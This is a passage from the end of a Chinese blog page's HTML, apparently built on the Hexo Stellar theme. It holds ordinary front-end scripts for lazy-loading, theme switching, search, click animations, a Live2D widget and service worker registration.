15.5l3-3l3 3m-6-4l3-3l3 3"/><path d="M7 3.338A9.95 9.95 0 0 1 12 2c5.523 0 10 4.477 10 10s-4.477 10-10 10S2 17.523 2 12c0-1.821.487-3.53 1.338-5"/></g></svg><span>回到顶部</span></a></div></widget>
</div></aside><div class='float-panel'>
  <button type='button' style='display:none' class='laptop-only rightbar-toggle mobile' onclick='sidebar.rightbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 6h11m-11 6h11m-11 6h11M4 6h1v4m-1 0h2m0 8H4c0-1 2-2 2-3s-1-1.5-2-1"/></svg>
  </button>
  <button type='button' style='display:none' class='mobile-only leftbar-toggle mobile' onclick='sidebar.leftbar()'>
    <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-width="1.5"><path d="M2 11c0-3.771 0-5.657 1.172-6.828C4.343 3 6.229 3 10 3h4c3.771 0 5.657 0 6.828 1.172C22 5.343 22 7.229 22 11v2c0 3.771 0 5.657-1.172 6.828C19.657 21 17.771 21 14 21h-4c-3.771 0-5.657 0-6.828-1.172C2 18.657 2 16.771 2 13z"/><path id="sep" stroke-linecap="round" d="M5.5 10h6m-5 4h4m4.5 7V3"/></g></svg>
  </button>
</div>
</div><div class="scripts">


<script type="text/javascript">
  window.canonical = {"originalHost":null,"officialHosts":["localhost"],"encoded":""};
  const ctx = {
    date_suffix: {
      just: `刚刚`,
      min: `分钟前`,
      hour: `小时前`,
      day: `天前`,
    },
    root : `/`,
    tag_plugins: {
      chat: Object.assign({"api":"https://siteinfo.listentothewind.cn/api/v1"}),
    }
  };

  // required plugins (only load if needs)
  if (`local_search`) {
    ctx.search = {};
    ctx.search.service = `local_search`;
    if (ctx.search.service == 'local_search') {
      let service_obj = Object.assign({}, `{"field":"all","path":"/search.json","content":true,"skip_search":null,"sort":"-date"}`);
      ctx.search[ctx.search.service] = service_obj;
    }
  }
  const def = {
    avatar: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/avatar/round/3442075.svg`,
    cover: `https://gcore.jsdelivr.net/gh/cdn-x/placeholder@1.0.12/cover/76b86c0226ffd.svg`,
    loading: `https://api.iconify.design/eos-icons:three-dots-loading.svg?color=%231cd0fd`,
  };
  const deps = {
    jquery: `https://gcore.jsdelivr.net/npm/jquery@3.7/dist/jquery.min.js`,
    marked: `https://gcore.jsdelivr.net/npm/marked@13.0/lib/marked.umd.min.js`,
    lazyload: `/%5Bobject%20Object%5D`
  }
  

</script>

<script type="text/javascript">
  
  function RunItem() {
    this.list = []; // 存放回调函数
    this.start = () => {
      for (var i = 0; i < this.list.length; i++) {
        this.list[i].run();
      }
    };
    this.push = (fn, name, setRequestAnimationFrame = true) => {
      let myfn = fn
      if (setRequestAnimationFrame) {
        myfn = () => {
          utils.requestAnimationFrame(fn)
        }
      }
      var f = new Item(myfn, name);
      this.list.push(f);
    };
    this.remove = (name) => {
      for (let index = 0; index < this.list.length; index++) {
        const e = this.list[index];
        if (e.name == name) {
          this.list.splice(index, 1);
        }
      }
    }
    // 构造一个可以run的对象
    function Item(fn, name) {
      // 函数名称
      this.name = name || fn.name;
      // run方法
      this.run = () => {
        try {
          fn()
        } catch (error) {
          console.log(error);
        }
      };
    }
  }

  const utils = {
    // 懒加载 css https://github.com/filamentgroup/loadCSS
    css: (href, before, media, attributes) => {
      var doc = window.document;
      var ss = doc.createElement("link");
      var ref;
      if (before) {
        ref = before;
      } else {
        var refs = (doc.body || doc.getElementsByTagName("head")[0]).childNodes;
        ref = refs[refs.length - 1];
      }
      var sheets = doc.styleSheets;
      if (attributes) {
        for (var attributeName in attributes) {
          if (attributes.hasOwnProperty(attributeName)) {
            ss.setAttribute(attributeName, attributes[attributeName]);
          }
        }
      }
      ss.rel = "stylesheet";
      ss.href = href;
      ss.media = "only x";
      function ready(cb) {
        if (doc.body) {
          return cb();
        }
        setTimeout(function () {
          ready(cb);
        });
      }
      ready(function () {
        ref.parentNode.insertBefore(ss, before ? ref : ref.nextSibling);
      });
      var onloadcssdefined = function (cb) {
        var resolvedHref = ss.href;
        var i = sheets.length;
        while (i--) {
          if (sheets[i].href === resolvedHref) {
            return cb();
          }
        }
        setTimeout(function () {
          onloadcssdefined(cb);
        });
      };
      function loadCB() {
        if (ss.addEventListener) {
          ss.removeEventListener("load", loadCB);
        }
        ss.media = media || "all";
      }
      if (ss.addEventListener) {
        ss.addEventListener("load", loadCB);
      }
      ss.onloadcssdefined = onloadcssdefined;
      onloadcssdefined(loadCB);
      return ss;
    },

    js: (src, opt) => new Promise((resolve, reject) => {
      var script = document.createElement('script');
      if (src.startsWith('/')) {
        src = ctx.root + src.substring(1);
      }
      script.src = src;
      if (opt) {
        for (let key of Object.keys(opt)) {
          script[key] = opt[key]
        }
      } else {
        // 默认异步，如果需要同步，第二个参数传入 {} 即可
        script.async = true
      }
      script.onerror = reject
      script.onload = script.onreadystatechange = function () {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    }),

    jq: (fn) => {
      if (typeof jQuery === 'undefined') {
        utils.js(deps.jquery).then(fn)
      } else {
        fn()
      }
    },

    onLoading: (el) => {
      if (el) {
        $(el).append('<div class="loading-wrap"><svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" stroke-opacity=".3" d="M12 3C16.9706 3 21 7.02944 21 12C21 16.9706 16.9706 21 12 21C7.02944 21 3 16.9706 3 12C3 7.02944 7.02944 3 12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="1.3s" values="60;0"/></path><path stroke-dasharray="15" stroke-dashoffset="15" d="M12 3C16.9706 3 21 7.02944 21 12"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.3s" values="15;0"/><animateTransform attributeName="transform" dur="1.5s" repeatCount="indefinite" type="rotate" values="0 12 12;360 12 12"/></path></g></svg></div>');
      }
    },
    onLoadSuccess: (el) => {
      if (el) {
        $(el).find('.loading-wrap').remove();
      }
    },
    onLoadFailure: (el) => {
      if (el) {
        $(el).find('.loading-wrap svg').remove();
        $(el).find('.loading-wrap').append('<svg xmlns="http://www.w3.org/2000/svg" width="2em" height="2em" preserveAspectRatio="xMidYMid meet" viewBox="0 0 24 24"><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"><path stroke-dasharray="60" stroke-dashoffset="60" d="M12 3L21 20H3L12 3Z"><animate fill="freeze" attributeName="stroke-dashoffset" dur="0.5s" values="60;0"/></path><path stroke-dasharray="6" stroke-dashoffset="6" d="M12 10V14"><animate fill="freeze" attributeName="stroke-dashoffset" begin="0.6s" dur="0.2s" values="6;0"/></path></g><circle cx="12" cy="17" r="1" fill="currentColor" fill-opacity="0"><animate fill="freeze" attributeName="fill-opacity" begin="0.8s" dur="0.4s" values="0;1"/></circle></svg>');
        $(el).find('.loading-wrap').addClass('error');
      }
    },
    request: (el, url, callback, onFailure) => {
      const maxRetry = 3;
      let retryCount = 0;

      return new Promise((resolve, reject) => {
        const load = () => {
          utils.onLoading?.(el);

          let timedOut = false;
          const timeout = setTimeout(() => {
            timedOut = true;
            console.warn('[request] 超时:', url);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject('请求超时');
            } else {
              setTimeout(load, 1000);
            }
          }, 5000);

          fetch(url).then(resp => {
            if (timedOut) return;
            clearTimeout(timeout);

            if (!resp.ok) throw new Error('响应失败');
            return resp;
          }).then(data => {
            if (timedOut) return;
            utils.onLoadSuccess?.(el);
            callback(data);
            resolve(data);
          }).catch(err => {
            clearTimeout(timeout);
            console.warn('[request] 错误:', err);

            if (++retryCount >= maxRetry) {
              utils.onLoadFailure?.(el);
              onFailure?.();
              reject(err);
            } else {
              setTimeout(load, 1000);
            }
          });
        };

        load();
      });
    },
    requestWithoutLoading: (url, options = {}, maxRetry = 2, timeout = 5000) => {
      return new Promise((resolve, reject) => {
        let retryCount = 0;

        const tryRequest = () => {
          let timedOut = false;
          const timer = setTimeout(() => {
            timedOut = true;
            if (++retryCount > maxRetry) reject('timeout');
            else tryRequest();
          }, timeout);

          fetch(url, options)
            .then(resp => {
              clearTimeout(timer);
              if (!resp.ok) throw new Error('bad response');
              resolve(resp);
            })
            .catch(err => {
              clearTimeout(timer);
              if (++retryCount > maxRetry) reject(err);
              else setTimeout(tryRequest, 500);
            });
        };

        tryRequest();
      });
    },
    /********************** requestAnimationFrame ********************************/
    // 1、requestAnimationFrame 会把每一帧中的所有 DOM 操作集中起来，在一次重绘或回流中就完成，并且重绘或回流的时间间隔紧紧跟随浏览器的刷新频率，一般来说，这个频率为每秒60帧。
    // 2、在隐藏或不可见的元素中，requestAnimationFrame 将不会进行重绘或回流，这当然就意味着更少的的 cpu，gpu 和内存使用量。
    requestAnimationFrame: (fn) => {
      if (!window.requestAnimationFrame) {
        window.requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame || window.webkitRequestAnimationFrame;
      }
      window.requestAnimationFrame(fn)
    },
    dark: {},
  };

  // utils.dark.mode 当前模式 dark or light
  // utils.dark.toggle() 暗黑模式触发器
  // utils.dark.push(callBack[,"callBackName"]) 传入触发器回调函数
  utils.dark.method = {
    toggle: new RunItem(),
  };
  utils.dark = Object.assign(utils.dark, {
    push: utils.dark.method.toggle.push,
  });
</script>
<script>
  const sidebar = {
    leftbar: () => {
      if (l_body) {
        l_body.toggleAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    rightbar: () => {
      if (l_body) {
        l_body.toggleAttribute('rightbar');
        l_body.removeAttribute('leftbar');
      }
    },
    dismiss: () => {
      if (l_body) {
        l_body.removeAttribute('leftbar');
        l_body.removeAttribute('rightbar');
      }
    },
    toggleTOC: () => {
      document.querySelector('#data-toc').classList.toggle('collapse');
    }
  }
</script>
<script type="text/javascript">
  (() => {
    const tagSwitchers = document.querySelectorAll('.tag-subtree.parent-tag > a > .tag-switcher-wrapper')
    for (const tagSwitcher of tagSwitchers) {
      tagSwitcher.addEventListener('click', (e) => {
        const parent = e.target.closest('.tag-subtree.parent-tag')
        parent.classList.toggle('expanded')
        e.preventDefault()
      })
    }

    // Get active tag from query string, then activate it.
    const urlParams = new URLSearchParams(window.location.search)
    const activeTag = urlParams.get('tag')
    if (activeTag) {
      let tag = document.querySelector(`.tag-subtree[data-tag="${activeTag}"]`)
      if (tag) {
        tag.querySelector('a').classList.add('active')
        
        while (tag) {
          tag.classList.add('expanded')
          tag = tag.parentElement.closest('.tag-subtree.parent-tag')
        }
      }
    }
  })()
</script>

<script async src="https://gcore.jsdelivr.net/npm/vanilla-lazyload@19.1/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazy",
    callback_loaded: (el) => {
      el.classList.add('loaded');
      const wrapper = el.closest('.lazy-box');
      const icon = wrapper?.querySelector('.lazy-icon');
      if (icon) icon.remove();
    }
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    window.lazyLoadInstance?.update();
  });

  window.wrapLazyloadImages = (container) => {
    if (typeof container === 'string') {
      container = document.querySelector(container);
    }
    if (!container) return;
    
    const images = container.querySelectorAll('img');
    images.forEach((img) => {
      if (img.classList.contains('lazy')) return;

      const src = img.getAttribute('src');
      if (!src) return;

      const wrapper = document.createElement('div');
      wrapper.className = 'lazy-box';

      const newImg = img.cloneNode();
      newImg.removeAttribute('src');
      newImg.setAttribute('data-src', src);
      newImg.classList.add('lazy');

      const icon = document.createElement('div');
      icon.className = 'lazy-icon';
      if (def.loading) {
        icon.style.backgroundImage = `url("${def.loading}")`;
      }

      wrapper.appendChild(newImg);
      wrapper.appendChild(icon);

      img.replaceWith(wrapper);
    });

    // 通知 LazyLoad 更新
    if (window.lazyLoadInstance?.update) {
      window.lazyLoadInstance.update();
    }
  }
  
</script>

<!-- required -->
<script src="/js/main.js?v=1.33.1" defer></script>

<script type="text/javascript">
  const applyTheme = (theme) => {
    document.documentElement.setAttribute('data-theme', theme)
  }

  const switchTheme = () => {
    const currentTheme = document.documentElement.getAttribute('data-theme')
    let newTheme;
    if (currentTheme === 'light') {
      newTheme = 'dark'
    } else {
      newTheme = 'light'
    }
    applyTheme(newTheme)
    window.localStorage.setItem('Stellar.theme', newTheme)
    
    const messages = {
      light: `切换到浅色模式`,
      dark: `切换到深色模式`,
    }
    hud?.toast?.(messages[newTheme])
  }

  (() => {
    const theme = window.localStorage.getItem('Stellar.theme')
    if (theme !== null) {
      applyTheme(theme)
    } else {
      applyTheme('dark')
    }
  })()
</script>

<!-- optional -->



<script defer>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.services = Object.assign({}, JSON.parse(`{"mdrender":{"js":"/js/services/mdrender.js"},"siteinfo":{"js":"/js/services/siteinfo.js","api":null},"ghinfo":{"js":"/js/services/ghinfo.js"},"rating":{"js":"/js/services/rating.js","api":"https://star-vote.xaox.cc/api/rating"},"vote":{"js":"/js/services/vote.js","api":"https://star-vote.xaox.cc/api/vote"},"sites":{"js":"/js/services/sites.js"},"friends":{"js":"/js/services/friends.js"},"friends_and_posts":{"js":"/js/services/friends_and_posts.js"},"timeline":{"js":"/js/services/timeline.js"},"fcircle":{"js":"/js/services/fcircle.js"},"weibo":{"js":"/js/services/weibo.js"},"memos":{"js":"/js/services/memos.js"},"voice":{"js":"/js/plugins/voice.js"},"video":{"js":"/js/plugins/video.js"},"download-file":{"js":"/js/plugins/download-file.js"},"twikoo":{"js":"/js/services/twikoo_latest_comment.js"},"waline":{"js":"/js/services/waline_latest_comment.js"},"artalk":{"js":"/js/services/artalk_latest_comment.js"},"giscus":{"js":"/js/services/giscus_latest_comment.js"},"contributors":{"edit_this_page":{"_posts/":null,"wiki/stellar/":"https://github.com/xaoxuu/hexo-theme-stellar-docs/blob/main/"},"js":"/js/services/contributors.js"}}`));
    for (let id of Object.keys(ctx.services)) {
      const js = ctx.services[id].js;
      if (id == 'siteinfo') {
        ctx.cardlinks = document.querySelectorAll('a.link-card[cardlink]');
        if (ctx.cardlinks?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            setCardLink(ctx.cardlinks);
          });
        }
      } else if (id == 'voice') {
        ctx.voiceAudios = document.querySelectorAll('.voice>audio');
        if (ctx.voiceAudios?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            createVoiceDom(ctx.voiceAudios);
          });
        }
      } else if (id == 'video') {
        ctx.videos = document.querySelectorAll('.video>video');
        if (ctx.videos?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            videoEvents(ctx.videos);
          });
        }
      } else if (id == 'download-file') {
        ctx.files = document.querySelectorAll('.file');
        if (ctx.files?.length > 0) {
          utils.js(js, { defer: true }).then(function () {
            downloadFileEvent(ctx.files);
          });
        }
      } else {
        const els = document.getElementsByClassName(`ds-${id}`);
        if (els?.length > 0) {
          utils.jq(() => {
            if (id == 'timeline' || 'memos' || 'marked') {
              utils.js(deps.marked).then(function () {
                utils.js(js, { defer: true });
              });
            } else {
              utils.js(js, { defer: true });
            }
          });
        }
      }
    }

    // chat iphone time
    let phoneTimes = document.querySelectorAll('.chat .status-bar .time');

    if (phoneTimes.length > 0) {
      NowTime();
      var date = new Date();
      var sec = date.getSeconds();
      var firstAdjustInterval = setInterval(firstAdjustTime, 1000 * (60 - sec));
    }

    function firstAdjustTime() {
      NowTime();
      clearInterval(firstAdjustInterval);
      setInterval(NowTime, 1000 * 60);
    }

    function NowTime() {
      for (let i = 0; i < phoneTimes.length; ++i) {
        var timeSpan = phoneTimes[i];
        var date = new Date();
        var hour = date.getHours();
        var min = date.getMinutes();
        timeSpan.innerHTML = check(hour) + ":" + check(min);
      }
    };

    function check(val) {
      if (val < 10) {
        return ("0" + val);
      }
      return (val);
    }

    // chat quote
    const chat_quote_obverser = new IntersectionObserver((entries, observer) => {
      entries.filter((entry) => { return entry.isIntersecting }).sort((a, b) => a.intersectionRect.y !== b.intersectionRect.y ? a.intersectionRect.y - b.intersectionRect.y : a.intersectionRect.x - b.intersectionRect.x).forEach((entry, index) => {
          observer.unobserve(entry.target);
          setTimeout(() => {
            entry.target.classList.add('quote-blink');
            setTimeout(() => {
              entry.target.classList.remove('quote-blink');
            }, 1000);
          }, Math.max(100, 16) * (index + 1));
        });
    });

    var chatQuotes = document.querySelectorAll(".chat .talk .quote");
    chatQuotes.forEach((quote) => {
      quote.addEventListener('click', function () {
        var chatCellDom = document.getElementById("quote-" + quote.getAttribute("quotedCellTag"));
        if (chatCellDom) {
          var chatDiv = chatCellDom.parentElement;
          var mid = chatDiv.clientHeight / 2;
          var offsetTop = chatCellDom.offsetTop;
          if (offsetTop > mid - chatCellDom.clientHeight / 2) {
            chatDiv.scrollTo({
              top: chatCellDom.offsetTop - mid + chatCellDom.clientHeight / 2,
              behavior: "smooth"
            });
          } else {
            chatDiv.scrollTo({
              top: 0,
              behavior: "smooth"
            });
          }
          chat_quote_obverser.observe(chatCellDom);
        }
      });
    });
  });
</script>

<script>
  window.addEventListener('DOMContentLoaded', (event) => {
    ctx.search = {
      path: `/search.json`,
    }
    utils.js('/js/search/local-search.js', { defer: true });
  });
</script><script>
  window.FPConfig = {
    delay: 0,
    ignoreKeywords: [],
    maxRPS: 5,
    hoverDelay: 25
  };
</script>
<script defer src="https://gcore.jsdelivr.net/npm/flying-pages@2/flying-pages.min.js"></script><script>
  window.addEventListener('DOMContentLoaded', (event) => {
    const swiper_api = document.getElementById('swiper-api');
    if (swiper_api != undefined) {
      utils.css(`https://unpkg.com/swiper@10.3/swiper-bundle.min.css`);
      utils.js(`https://unpkg.com/swiper@10.3/swiper-bundle.min.js`, { defer: true }).then(function () {
        const effect = swiper_api.getAttribute('effect') || '';
        var swiper = new Swiper('.swiper#swiper-api', {
          slidesPerView: 'auto',
          spaceBetween: 8,
          centeredSlides: true,
          effect: effect,
          rewind: true,
          pagination: {
            el: '.swiper-pagination',
            clickable: true,
          },
          navigation: {
            nextEl: '.swiper-button-next',
            prevEl: '.swiper-button-prev',
          },
        });
      })
    }
  });
</script>
<script>
  document.addEventListener('DOMContentLoaded', function () {
    window.codeElements = document.querySelectorAll('.code');
    if (window.codeElements.length > 0) {
      ctx.copycode = {
        default_text: `Copy`,
        success_text: `Copied`,
        toast: `复制成功`,
      };
      utils.js('/js/plugins/copycode.js');
    }
  });
</script>


<!-- inject -->


<!-- Custom Image Viewer -->
<script src="/js/plugins/image-viewer.js"></script>

<!-- Custom Context Menu -->
<script src="/js/plugins/custom-context-menu.js"></script>

<!-- Glitch Effect -->
<script src="/js/plugins/glitch-effect.js"></script>

<!-- Terminal Copy -->
<script src="/js/plugins/terminal-copy.js"></script>

<!-- Hotkeys -->
<script src="/js/plugins/hotkeys.js"></script>

<!-- Achievements / Card System -->
<script src="/js/plugins/achievements.js"></script>

<!-- Special Days - 节日彩蛋系统 -->
<script src="/js/plugins/special-days.js"></script>

<!-- Music Player -->
<script src="/js/plugins/music-player.js"></script>

<!-- Offline Vault - 断网保护机制 -->
<script src="/js/plugins/offline-vault.js"></script>

<!-- Live2D Widget - Local Version -->
<script src="/live2d-widget/dist/autoload.js"></script>

<!-- Live2D Widget 位置调整和默认显示 -->
<style>
  #waifu {
    position: fixed !important;
    bottom: 20px !important;
    right: 20px !important;
    left: auto !important;
    z-index: 1000 !important;
    transform: none !important;
    display: block !important;
    opacity: 1 !important;
    visibility: visible !important;
  }
  #waifu #live2d {
    position: relative !important;
    transform: none !important;
  }
  #waifu-toolbar {
    position: relative !important;
    transform: none !important;
  }
  #waifu-toggle {
    display: none !important;
  }
</style>

<!-- 点击特效 -->
<script>
(function() {
  var clickEffects = {
    current: null,
    
    init: function() {
      this.current = localStorage.getItem('clickEffect') || 'none';
      this.bindEvents();
    },
    
    bindEvents: function() {
      var self = this;
      document.addEventListener('click', function(e) {
        if (self.current === 'none') return;
        if (e.target.closest('button, a, input, textarea, select, .post-card, .layout-btn')) return;
        self.createEffect(e.clientX, e.clientY);
      });
      
      window.addEventListener('storage', function(e) {
        if (e.key === 'clickEffect') {
          self.current = e.newValue || 'none';
        }
      });
    },
    
    createEffect: function(x, y) {
      switch(this.current) {
        case 'ripple': this.createRipple(x, y); break;
        case 'firework': this.createFirework(x, y); break;
        case 'particles': this.createParticles(x, y); break;
        case 'text': this.createText(x, y); break;
        default: break;
      }
    },
    
    createRipple: function(x, y) {
      var ripple = document.createElement('div');
      ripple.className = 'click-ripple';
      ripple.style.cssText = 'position:fixed;left:' + x + 'px;top:' + y + 'px;width:0;height:0;border-radius:50%;background:rgba(52,152,219,0.4);transform:translate(-50%,-50%);pointer-events:none;z-index:9999;animation:rippleExpand 0.6s ease-out forwards;';
      document.body.appendChild(ripple);
      setTimeout(function() { ripple.remove(); }, 600);
    },
    
    createFirework: function(x, y) {
      var colors = ['#ff6b6b', '#feca57', '#48dbfb', '#ff9ff3', '#54a0ff'];
      for (var i = 0; i < 12; i++) {
        var particle = document.createElement('div');
        var angle = (Math.PI * 2 / 12) * i;
        var velocity = 50 + Math.random() * 30;
        particle.style.cssText = 'position:fixed;left:' + x + 'px;top:' + y + 'px;width:6px;height:6px;border-radius:50%;background:' + colors[i % 5] + ';pointer-events:none;z-index:9999;transform:translate(-50%,-50%);';
        document.body.appendChild(particle);
        this.animateParticle(particle, x, y, x + Math.cos(angle) * velocity, y + Math.sin(angle) * velocity, 500);
      }
    },
    
    createParticles: function(x, y) {
      var colors = ['#ff6b6b', '#feca57', '#48dbfb', '#ff9ff3', '#54a0ff', '#5f27cd'];
      for (var i = 0; i < 8; i++) {
        var particle = document.createElement('div');
        particle.innerHTML = '✨';
        particle.style.cssText = 'position:fixed;left:' + (x + (Math.random()-0.5)*30) + 'px;top:' + (y + (Math.random()-0.5)*30) + 'px;font-size:16px;pointer-events:none;z-index:9999;animation:particleFloat 0.8s ease-out forwards;';
        document.body.appendChild(particle);
        setTimeout(function(p) { return function() { p.remove(); }; }(particle), 800);
      }
    },
    
    createText: function(x, y) {
      var texts = ['666', '厉害', 'nice', '棒', '赞', '给力'];
      var text = document.createElement('div');
      text.innerHTML = texts[Math.floor(Math.random() * texts.length)];
      text.style.cssText = 'position:fixed;left:' + x + 'px;top:' + y + 'px;font-size:18px;font-weight:bold;color:#3498db;pointer-events:none;z-index:9999;transform:translate(-50%,-50%);animation:textFloat 0.8s ease-out forwards;';
      document.body.appendChild(text);
      setTimeout(function() { text.remove(); }, 800);
    },
    
    animateParticle: function(el, startX, startY, endX, endY, duration) {
      var startTime = performance.now();
      function animate(currentTime) {
        var progress = Math.min((currentTime - startTime) / duration, 1);
        var easeOut = 1 - Math.pow(1 - progress, 3);
        el.style.left = (startX + (endX - startX) * easeOut) + 'px';
        el.style.top = (startY + (endY - startY) * easeOut) + 'px';
        el.style.opacity = 1 - progress;
        if (progress < 1) requestAnimationFrame(animate);
        else el.remove();
      }
      requestAnimationFrame(animate);
    }
  };
  
  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', function() { clickEffects.init(); });
  } else {
    clickEffects.init();
  }
  
  window.ClickEffects = clickEffects;
})();
</script>

<style>
@keyframes rippleExpand {
  0% { width: 0; height: 0; opacity: 1; }
  100% { width: 100px; height: 100px; opacity: 0; }
}
@keyframes particleFloat {
  0% { opacity: 1; transform: translateY(0) scale(1); }
  100% { opacity: 0; transform: translateY(-40px) scale(0.5); }
}
@keyframes textFloat {
  0% { opacity: 1; transform: translate(-50%, -50%) scale(1); }
  100% { opacity: 0; transform: translate(-50%, -80px) scale(1.2); }
}
</style>

<!-- PWA Service Worker -->
<script>
if ('serviceWorker' in navigator) {
  navigator.serviceWorker.register('/sw.js').then(function(reg) {
    console.log('Service Worker 已注册，支持离线访问');
  }).catch(function(err) {
    console.log('Service Worker 注册失败:', err);
  });
}
</script>

<!-- Random Cover Image -->
<script>
(function() {
  function refreshRandomCovers() {
    var images = document.querySelectorAll('img[src*="loliapi.com"]');
    images.forEach(function(img) {
      var src = img.src;
      var baseSrc = src.split('?')[0];
      img.src = baseSrc + '?t=' + Date.now() + '&r=' + Math.random().toString(36).substr(2, 9);
    });
  }
  
  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', refreshRandomCovers);
  } else {
    refreshRandomCovers();
  }
})();
</script>

</div></body></html>
